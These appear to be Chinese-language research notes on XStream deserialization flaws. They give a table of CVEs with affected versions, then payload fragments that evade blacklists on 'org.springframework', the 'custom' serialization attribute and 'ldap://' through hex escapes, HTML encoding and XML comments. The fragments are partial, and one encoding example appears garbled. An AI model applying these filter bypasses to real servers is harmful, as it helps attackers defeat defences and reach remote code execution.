| XStream 远程代码执行漏洞 | CVE-2013-7285 | 1.4.x<XStream ⇐ 1.4.6&=1.4.10 |
|---|---|---|
| XStream XXE | CVE-2016-3674 | 1.4.x<XStream ⇐ 1.4.8 |
| XStream 远程代码执行漏洞 | CVE-2019-10173 | XStream = 1.4.10 |
| XStream 远程代码执行漏洞 | CVE-2020-26217 | 1.4.x<XStream ⇐ 1.4.13 |
| XStream 远程代码执行漏洞 | CVE-2021-21344 | 1.4.x<XStream: ⇐ 1.4.15 |
| XStream 远程代码执行漏洞 | CVE-2021-21345 | 1.4.x<XStream: ⇐ 1.4.15 |
| XStream 远程代码执行漏洞 | CVE-2021-21346 | 1.4.x<XStream: ⇐ 1.4.15 |
| XStream 远程代码执行漏洞 | CVE-2021-21347 | 1.4.x<XStream⇐ 1.4.15 |
| XStream 远程代码执行漏洞 | CVE-2021-21350 | 1.4.x<XStream: ⇐ 1.4.15 |
| XStream 远程代码执行漏洞 | CVE-2021-21351 | 1.4.x<XStream: ⇐ 1.4.15 |
| XStream 远程代码执行漏洞 | CVE-2021-29505 | 1.4.x<XStream: ⇐ 1.4.16 |
| XStream 远程代码执行漏洞 | CVE-2021-39141 | 1.4.x<XStream: ⇐ 1.4.17 |
| XStream 远程代码执行漏洞 | CVE-2021-39144 | 1.4.x<XStream: ⇐ 1.4.17 |
| XStream 远程代码执行漏洞 | CVE-2021-39146 | 1.4.x<XStream: ⇐ 1.4.17 |
| XStream 远程代码执行漏洞 | CVE-2021-39148 | 1.4.x<XStream: ⇐ 1.4.17 |
| XStream 远程代码执行漏洞 | CVE-2021-39152 | 1.4.x<XStream: ⇐ 1.4.17 |
| XStream 远程代码执行漏洞 | CVE-2021-39154 | 1.4.x<XStream: ⇐ 1.4.17 |
bypass
16 进制绕过
黑名单为:org[.]springframework payload:
<org.s_.0070ringframework.aop.support.AbstractBeanFactoryPointcutAdvisor>
</org.s_.0070ringframework.aop.support.AbstractBeanFactoryPointcutAdvisor>针对标签属性内容的绕过
黑名单:custom payload:
<org.springframework.aop.support.AbstractBeanFactoryPointcutAdvisor serialization="custom">
</org.springframework.aop.support.AbstractBeanFactoryPointcutAdvisor>针对标签内容的绕过
黑名单:ldap:// payload:
1. html 编码
<test>
ldap://xxxxx
</test>
2. 注释
<test>
ld<!-- test -->ap://xxxxx
</test>